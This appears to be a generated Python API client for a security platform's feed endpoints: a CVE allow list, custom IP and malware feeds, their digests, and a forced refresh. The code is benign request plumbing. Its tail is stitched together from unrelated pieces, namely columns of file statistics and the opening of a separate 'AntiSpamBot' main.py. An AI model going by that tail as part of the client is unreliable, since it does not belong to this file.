def api_v1_feeds_custom_cve_allow_list_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_cve_allow_list_get # noqa: E501
CVEAllowList returns the list of allowed CVEs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_cve_allow_list_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SharedCVEAllowList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_cve_allow_list_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "SharedCVEAllowList",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/cve-allow-list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_cve_allow_list_put(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_cve_allow_list_put # noqa: E501
SetCVEAllowList adds the given CVE allow list entries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_cve_allow_list_put(async_req=True)
>>> result = thread.get()
:param shared_cve_allow_list:
:type shared_cve_allow_list: SharedCVEAllowList
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_cve_allow_list_put_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_cve_allow_list_put_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_cve_allow_list_put # noqa: E501
SetCVEAllowList adds the given CVE allow list entries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_cve_allow_list_put_with_http_info(async_req=True)
>>> result = thread.get()
:param shared_cve_allow_list:
:type shared_cve_allow_list: SharedCVEAllowList
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'shared_cve_allow_list'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_cve_allow_list_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'shared_cve_allow_list' in local_var_params:
body_params = local_var_params['shared_cve_allow_list']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/custom/cve-allow-list', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_ips_digest_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_ips_digest_get # noqa: E501
CustomIPFeedDigest returns the custom ip feed digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_ips_digest_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: str
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_ips_digest_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_ips_digest_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_ips_digest_get # noqa: E501
CustomIPFeedDigest returns the custom ip feed digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_ips_digest_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_ips_digest_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "str",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/ips/digest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_ips_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_ips_get # noqa: E501
CustomIPFeed returns the custom ip feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_ips_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SharedCustomIPFeed
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_ips_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_ips_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_ips_get # noqa: E501
CustomIPFeed returns the custom ip feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_ips_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SharedCustomIPFeed, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_ips_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "SharedCustomIPFeed",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/ips', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_ips_put(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_ips_put # noqa: E501
SetCustomIPFeed sets the custom IP feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_ips_put(async_req=True)
>>> result = thread.get()
:param shared_custom_ip_feed:
:type shared_custom_ip_feed: SharedCustomIPFeed
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_ips_put_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_ips_put_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_ips_put # noqa: E501
SetCustomIPFeed sets the custom IP feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_ips_put_with_http_info(async_req=True)
>>> result = thread.get()
:param shared_custom_ip_feed:
:type shared_custom_ip_feed: SharedCustomIPFeed
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'shared_custom_ip_feed'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_ips_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'shared_custom_ip_feed' in local_var_params:
body_params = local_var_params['shared_custom_ip_feed']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/custom/ips', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_malware_digest_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_malware_digest_get # noqa: E501
CustomMalwareFeedDigest returns the custom malware feed digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_malware_digest_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: str
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_malware_digest_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_malware_digest_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_malware_digest_get # noqa: E501
CustomMalwareFeedDigest returns the custom malware feed digest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_malware_digest_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_malware_digest_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "str",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/malware/digest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_malware_get(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_malware_get # noqa: E501
CustomMalwareFeed returns the custom malware feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_malware_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SharedCustomMalwareFeed
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_malware_get_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_malware_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_malware_get # noqa: E501
CustomMalwareFeed returns the custom malware feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_malware_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SharedCustomMalwareFeed, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_malware_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "SharedCustomMalwareFeed",
}
return self.api_client.call_api(
'/api/v1/feeds/custom/malware', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_malware_put(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_malware_put # noqa: E501
SetCustomMalwareFeed sets the custom malware feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_malware_put(async_req=True)
>>> result = thread.get()
:param shared_custom_malware_feed:
:type shared_custom_malware_feed: SharedCustomMalwareFeed
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_custom_malware_put_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_custom_malware_put_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_custom_malware_put # noqa: E501
SetCustomMalwareFeed sets the custom malware feed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_custom_malware_put_with_http_info(async_req=True)
>>> result = thread.get()
:param shared_custom_malware_feed:
:type shared_custom_malware_feed: SharedCustomMalwareFeed
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'shared_custom_malware_feed'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_custom_malware_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'shared_custom_malware_feed' in local_var_params:
body_params = local_var_params['shared_custom_malware_feed']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/custom/malware', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_force_refresh_put(self, **kwargs): # noqa: E501
"""api_v1_feeds_force_refresh_put # noqa: E501
ForceIntelligenceUpdate performs pushing/polling of intelligence feeds on demand # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_force_refresh_put(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_feeds_force_refresh_put_with_http_info(**kwargs) # noqa: E501
def api_v1_feeds_force_refresh_put_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_feeds_force_refresh_put # noqa: E501
ForceIntelligenceUpdate performs pushing/polling of intelligence feeds on demand # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_feeds_force_refresh_put_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_feeds_force_refresh_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/v1/feeds/force-refresh', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 42.479474
| 124
| 0.5977
| 8,903
| 80,711
| 5.104347
| 0.025609
| 0.030455
| 0.044054
| 0.038025
| 0.979139
| 0.978215
| 0.977401
| 0.976873
| 0.976675
| 0.975002
| 0
| 0.012379
| 0.338405
| 80,711
| 1,899
| 125
| 42.501843
| 0.838664
| 0.511293
| 0
| 0.76625
| 1
| 0
| 0.158072
| 0.068941
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03875
| false
| 0
| 0.00625
| 0
| 0.08375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3697e1f7749a490836d40c6eb5f61922453e4d3a
| 1,662
|
py
|
Python
|
main.py
|
hyperstore2020/AntiSpamBot
|
c349542d9ccd9f59339caadda5aa6412a65d40aa
|
[
"MIT"
] | null | null | null |
main.py
|
hyperstore2020/AntiSpamBot
|
c349542d9ccd9f59339caadda5aa6412a65d40aa
|
[
"MIT"
] | 1
|
2020-05-08T12:31:11.000Z
|
2020-05-08T12:31:11.000Z
|
main.py
|
hyperstore2020/AntiSpamBot
|
c349542d9ccd9f59339caadda5aa6412a65d40aa
|
[
"MIT"
] | null | null | null |
import base64
token = "yourtokenhere"
